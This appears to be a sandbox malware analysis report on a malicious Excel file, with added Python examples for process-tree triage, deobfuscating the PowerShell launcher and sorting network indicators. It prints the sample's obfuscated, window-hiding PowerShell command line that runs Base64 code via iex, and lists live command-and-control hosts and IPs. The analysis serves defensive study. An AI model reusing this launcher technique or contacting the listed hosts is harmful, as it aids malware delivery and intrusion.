Malware Analysis Report

2024-12-07 16:59

Sample ID: 241113-c9eedsykgl
Target: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
SHA256: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
Tags: defense_evasion discovery execution
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf

Threat Level: Known bad

The file aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Uses Task Scheduler COM API

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-13 02:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-13 02:46
Reported: 2024-11-13 02:48
Platform: win7-20240903-en
Max time kernel: 139s
Max time network: 140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A
N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1976 set thread context of 2124 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe
PID 2124 set thread context of 3048 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
PID 2124 set thread context of 2360 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mstsc.exe
PID 2360 set thread context of 3048 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A
Key created | \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\mstsc.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2732 wrote to memory of 2476 (4 events) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2476 wrote to memory of 876 (4 events) | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 768 (4 events) | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 768 wrote to memory of 1992 (4 events) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 1976 (4 events) | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 1976 wrote to memory of 2124 (5 events) | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe
PID 3048 wrote to memory of 2360 (4 events) | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | C:\Windows\SysWOW64\mstsc.exe
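Reading the signature tables above as a process tree, as an added example. This code is not part of the sandbox report: PIDs and image paths are the report's, the parent links are inferred here from the WriteProcessMemory and Processes tables because the export prints no parent PIDs, and the four detection rules are this example's own assumptions. Most WriteProcessMemory rows are noise: a parent writing into a child it has just created (mshta.exe into PowerShell, PowerShell into csc.exe, csc.exe into cvtres.exe) is how CreateProcess sets the child up. The rows that matter are the ones paired with SetThreadContext: wlanext.exe (1976) starts svchost.exe (2124), writes into it and resets its thread context, after which the Processes list shows svchost.exe running with wlanext.exe's command line, the classic hollowing footprint; 2124 then sets the thread context of EXCEL.EXE (3048) and mstsc.exe (2360), neither of which is its child, which is cross-process thread hijacking rather than hollowing. The "Drops file in System32 directory" hit is also noise: the recorded path contains the literal, unexpanded %ProgramData%, i.e. a relative path resolved against the process working directory, and it fires identically for both PowerShell instances.

```python
"""Process-tree triage for the behavioral1 run: Office spawning children,
image/command-line mismatches, and SetThreadContext-based hollowing.

Added example, not part of the sandbox report. PIDs and image paths are
the report's; parent links are inferred here from its Processes and
WriteProcessMemory tables, because the export prints no PPIDs.
"""
import os
from collections import defaultdict

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# (pid, ppid, image path, command line); ppid 1 stands for the sandbox launcher.
# Constructed from the report; long command lines are shortened.
PROCESSES = [
    (3048, 1, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
     r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\sample.xls'),
    (2732, 3048, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    (2476, 2732, r"C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE",
     r'"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex(...)"'),
    (876, 2476, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt'),
    (768, 2476, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"'),
    (1992, 768, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
     r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    (1976, 2476, r"C:\Users\Admin\AppData\Roaming\wlanext.exe", r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'),
    # Image says svchost.exe, command line says wlanext.exe: the hollowed host.
    (2124, 1976, r"C:\Windows\SysWOW64\svchost.exe", r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'),
    (2360, 3048, r"C:\Windows\SysWOW64\mstsc.exe", r'"C:\Windows\SysWOW64\mstsc.exe"'),
]
# (source pid, target pid) pairs from the WriteProcessMemory and SetThreadContext tables.
WRITES = {(2732, 2476), (2476, 876), (2476, 768), (768, 1992),
          (2476, 1976), (1976, 2124), (3048, 2360)}
THREAD_CONTEXT = [(1976, 2124), (2124, 3048), (2124, 2360), (2360, 3048)]


def basename(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def exe_from_cmdline(cmdline: str) -> str:
    """First argv element, honouring a leading double-quoted path."""
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(None, 1)[0]


def in_system_dir(image: str) -> bool:
    return image.lower().startswith(SYSTEM_DIRS)


def analyze(processes, writes, thread_context):
    """Return (rule, source pid, target pid) findings over the event set."""
    by_pid = {p[0]: p for p in processes}
    children = defaultdict(set)
    for pid, ppid, _, _ in processes:
        children[ppid].add(pid)

    findings = []
    for pid, ppid, image, cmdline in processes:
        parent = by_pid.get(ppid)
        if parent and basename(parent[2]) in OFFICE_IMAGES:
            findings.append(("office_unexpected_child", ppid, pid))
        # Compare basenames only: WOW64 redirection makes System32 in the
        # command line show up as SysWOW64 in the image path, which is benign.
        if basename(exe_from_cmdline(cmdline)) != basename(image):
            findings.append(("cmdline_image_mismatch", pid, pid))

    for src, dst in thread_context:
        if dst in children[src]:
            # WriteProcessMemory into a child the parent just created is how
            # CreateProcess works; only paired with SetThreadContext on a
            # system binary does it become a hollowing signal.
            if (src, dst) in writes and in_system_dir(by_pid[dst][2]):
                findings.append(("hollowing", src, dst))
        else:
            findings.append(("remote_thread_hijack", src, dst))
    return findings


if __name__ == "__main__":
    for rule, src, dst in analyze(PROCESSES, WRITES, THREAD_CONTEXT):
        print(f"{rule:26} {src} -> {dst}")
```

Run stand-alone it prints the two unexpected Excel children (mshta.exe and mstsc.exe), the single image/command-line mismatch on PID 2124, the one hollowing pair (1976 into 2124) and the three remote thread hijacks; the mshta-to-PowerShell and PowerShell-to-csc writes produce nothing, as intended.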

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"
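How the PowerShell launcher listed above unpacks, as an added worked example. This code is not part of the sandbox report, and the Base64 blob it decodes is a constructed placeholder, since the report elides the real one. The first PowerShell instance (PID 2476) is started through a case-mangled path; Windows paths are case-insensitive, so SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE is the ordinary binary, and the sandbox records it under SysWOW64 only because the 32-bit mshta.exe parent is subject to WOW64 file-system redirection. Its -C argument does two things: it launches a second powershell.exe (PID 876, whose recorded command line ends at DEVicecREdEnTiAlDEplOYMeNt), then iex's a Base64 stage. DeviceCredentialDeployment.exe is a signed binary in System32 whose side effect is to hide the console window of the process that invokes it, which is what the "Evasion via Device Credential Deployment" signature keys on. The [ChaR]58+[CHAr]0X3a fragments build the static member operator :: one character at a time so that [System.Text.Encoding]::UTF8.GetString and [System.Convert]::FromBase64String never appear literally. The csc.exe / cvtres.exe pair and the tnpx6mte.0.cs, .cmdline, .dll and .pdb files in Temp are what Add-Type leaves behind when the decoded stage compiles inline C#, a common way for such a stage to reach Win32 APIs before it drops wlanext.exe. The example folds the [char] concatenation, pulls out and decodes the Base64 argument, and expands the abbreviated switches (-Ex ByPass, -NoP, -w 1 = WindowStyle Hidden).

```python
"""Unpack the case-mangled PowerShell launcher recorded in behavioral1.

Added example, not part of the sandbox report. The Base64 blob is a
placeholder generated below (the report elides the real one), so the
"stage" this recovers is the constructed INNER string.
"""
import base64
import re

CHAR_RE = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
JOIN_RE = re.compile(r"'\s*\+\s*'")
B64_RE = re.compile(r"FromBase64String\(\s*[\"']?([A-Za-z0-9+/=]+)[\"']?\s*\)",
                    re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -Ex, -NoP and -w resolve to these. Trimmed to what the sample uses.
KNOWN_PARAMS = ("executionpolicy", "noprofile", "noninteractive", "nologo",
                "windowstyle", "command", "encodedcommand", "file")
WINDOW_STYLES = {"0": "normal", "1": "hidden", "2": "minimized", "3": "maximized"}

INNER = "Write-Host 'stage2 placeholder'"          # constructed stand-in payload
SAMPLE_B64 = base64.b64encode(INNER.encode("utf-8")).decode("ascii")
# Constructed to match the shape of the report's command line for PID 2476.
SAMPLE_CMDLINE = (
    '"C:\\Windows\\SysTEM32\\wiNdoWSPoWeRSheLl\\v1.0\\POwersHeLl.ExE" '
    '"pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; '
    "iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a"
    "+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58"
    "+'FroMBASe64strINg('+[ChaR]0X22+'" + SAMPLE_B64 + "'+[chaR]0X22+'))')))\""
)


def fold_char_concats(text: str) -> str:
    """Turn 'a'+[ChaR]58+[CHAr]0X3a+'b' into 'a::b'.

    Each [char]N becomes a one-character literal, then adjacent literals
    are glued. The sample only builds ':' (0x3a, twice, for '::') and
    '"' (0x22) this way. A [char]39 (single quote) would need escaping
    and is not handled.
    """
    folded = CHAR_RE.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", text)
    return JOIN_RE.sub("", folded)


def extract_stage(cmdline: str) -> str:
    """Recover the Base64 argument that iex() would run, decoded as UTF-8."""
    match = B64_RE.search(fold_char_concats(cmdline))
    if not match:
        raise ValueError("no FromBase64String(...) argument found")
    return base64.b64decode(match.group(1)).decode("utf-8")


def parse_switches(cmdline: str) -> dict:
    """Expand abbreviated powershell.exe switches to their full names."""
    tokens = cmdline.split()
    found = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            hits = [p for p in KNOWN_PARAMS if p.startswith(tok[1:].lower())]
            if len(hits) == 1:
                name = hits[0]
                if name in ("noprofile", "noninteractive", "nologo"):
                    found[name] = True
                elif i + 1 < len(tokens):
                    value = tokens[i + 1].lower()
                    if name == "windowstyle":
                        value = WINDOW_STYLES.get(value, value)
                    found[name] = value
                    i += 1
        i += 1
    return found


if __name__ == "__main__":
    print(parse_switches(SAMPLE_CMDLINE))
    print(fold_char_concats(SAMPLE_CMDLINE))
    print(extract_stage(SAMPLE_CMDLINE))
```

Against the real command line the same three steps apply unchanged; only the decoded text differs, and that text is what should be carved next for the Add-Type source and the URL that fetches wlanext.exe.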

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 4t.gg | udp
KR | 221.146.204.133:443 | 4t.gg | tcp
US | 8.8.8.8:53 | r10.o.lencr.org | udp
GB | 2.23.210.82:80 | r10.o.lencr.org | tcp
US | 107.173.4.61:80 | 107.173.4.61 | tcp
KR | 221.146.204.133:443 | 4t.gg | tcp
US | 107.173.4.61:80 | 107.173.4.61 | tcp
US | 107.173.4.61:80 | 107.173.4.61 | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.19.117.18:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.sodatool.site | udp
CN | 122.152.214.209:80 | www.sodatool.site | tcp
US | 8.8.8.8:53 | www.wwwzbk.app | udp
HK | 202.95.12.144:80 | www.wwwzbk.app | tcp
US | 8.8.8.8:53 | www.sqlite.org | udp
US | 45.33.6.223:80 | www.sqlite.org | tcp
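Separating indicators from sandbox background in the network table above, as an added example. This code is not part of the report; the rows are copied from this table plus one reverse-lookup row from the behavioral2 table, and the benign-suffix lists are this example's own assumptions. 8.8.8.8:53 is the sandbox resolver, so those rows matter only for the names they query; r10.o.lencr.org is Let's Encrypt's OCSP responder and crl.microsoft.com is Microsoft's CRL host, both reached by TLS and Authenticode validation rather than by the malware's own logic (the CryptnetUrlCache entries in the Files section are the same activity); www.sqlite.org is legitimate but is fetched by the chain (a sqlite3.dll lands in Temp in the same run), so it is context rather than a blocking indicator. What remains is 4t.gg over 443, www.sodatool.site and www.wwwzbk.app over 80, and a direct-to-IP HTTP connection to 107.173.4.61 that involves no DNS name at all.

```python
"""Sort the behavioral1 network table into IOC candidates and noise.

Added example, not part of the report. The rows are copied from the
report's behavioral1 network table (plus one reverse-lookup row from
behavioral2); the suffix lists are this example's own assumptions.
"""
import ipaddress

# Sandbox and Windows infrastructure that shows up in almost every run.
BENIGN_SUFFIXES = ("microsoft.com", "lencr.org", "officeapps.live.com",
                   "in-addr.arpa", "windowsupdate.com")
# Legitimate sites a payload may pull a dependency from: context, not blocklist.
LEGIT_THIRD_PARTY = ("sqlite.org",)

NETWORK_TABLE = """\
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 107.173.4.61:80 107.173.4.61 tcp
KR 221.146.204.133:443 4t.gg tcp
US 107.173.4.61:80 107.173.4.61 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.sodatool.site udp
CN 122.152.214.209:80 www.sodatool.site tcp
US 8.8.8.8:53 www.wwwzbk.app udp
HK 202.95.12.144:80 www.wwwzbk.app tcp
US 8.8.8.8:53 www.sqlite.org udp
US 45.33.6.223:80 www.sqlite.org tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
"""


def parse_rows(table: str):
    """Parse 'Country Destination Domain Proto' lines as the report prints them."""
    rows = []
    for line in table.strip().splitlines():
        country, dest, domain, proto = line.split()
        host, port = dest.rsplit(":", 1)
        rows.append({"country": country, "host": host, "port": int(port),
                     "domain": domain.lower(), "proto": proto})
    return rows


def has_suffix(name: str, suffixes) -> bool:
    return any(name == s or name.endswith("." + s) for s in suffixes)


def is_ip(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def triage(rows):
    out = {"dns_queries": set(), "infrastructure_noise": set(), "direct_ip": set(),
           "legit_third_party": set(), "c2_candidates": set()}
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            # The resolver (8.8.8.8) is the sandbox's; the queried name is the artefact.
            out["dns_queries"].add(r["domain"])
        elif has_suffix(r["domain"], BENIGN_SUFFIXES):
            out["infrastructure_noise"].add(r["domain"])
        elif is_ip(r["domain"]):
            # No name at all: the stage hard-codes the server address.
            out["direct_ip"].add(f"{r['host']}:{r['port']}")
        elif has_suffix(r["domain"], LEGIT_THIRD_PARTY):
            out["legit_third_party"].add(r["domain"])
        else:
            out["c2_candidates"].add((r["domain"], r["host"], r["port"], r["country"]))
    return out


def defang(name: str) -> str:
    return name.replace(".", "[.]")


def shareable_iocs(result):
    """Defanged host list for a write-up: named candidates plus hard-coded IPs."""
    names = {d for d, _, _, _ in result["c2_candidates"]}
    hosts = {h for _, h, _, _ in result["c2_candidates"]}
    ips = {hp.split(":")[0] for hp in result["direct_ip"]}
    return sorted(defang(x) for x in names | hosts | ips)


if __name__ == "__main__":
    result = triage(parse_rows(NETWORK_TABLE))
    for bucket, items in result.items():
        print(bucket, sorted(map(str, items)))
    print(shareable_iocs(result))
```

The allowlists are deliberately short: they cover what this run shows and should grow per sandbox platform, never from what the sample itself contacts.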

Files

memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp

memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp

memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 278f2c9dc15ca7c48785ffb7a522f3b6
SHA1 826e17b66ae225807c37f1534623ee2120cf3666
SHA256 67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661
SHA512 4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 8cea8ad0055cfa7e2996bb974d07439d
SHA1 0f79068cf7f28aa67c12849457f6b73eb319125a
SHA256 975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a
SHA512 68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a

C:\Users\Admin\AppData\Local\Temp\CabB210.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta

MD5 03ebca3f0b4171e32b0689a3410e79ad
SHA1 1e7b517e45f1b0e503e796bb6dcc7a6252f35364
SHA256 1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732
SHA512 a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c25ae41143a3dc8db0136cd00b75e178
SHA1 c0c8d88e62eb1b3e759677512ed50a320df32479
SHA256 73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754
SHA512 3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe

\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline

MD5 cb25a753d2162468e70eb450ff86d8ed
SHA1 994be0e177cc763e04068fffea58d20e30dd327f
SHA256 52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2
SHA512 b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb

\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp

MD5 5c851f4b3a74dc8112c0363e7a4c058b
SHA1 9efc91ddaf92b054bc744fce8fa49abb8487d06e
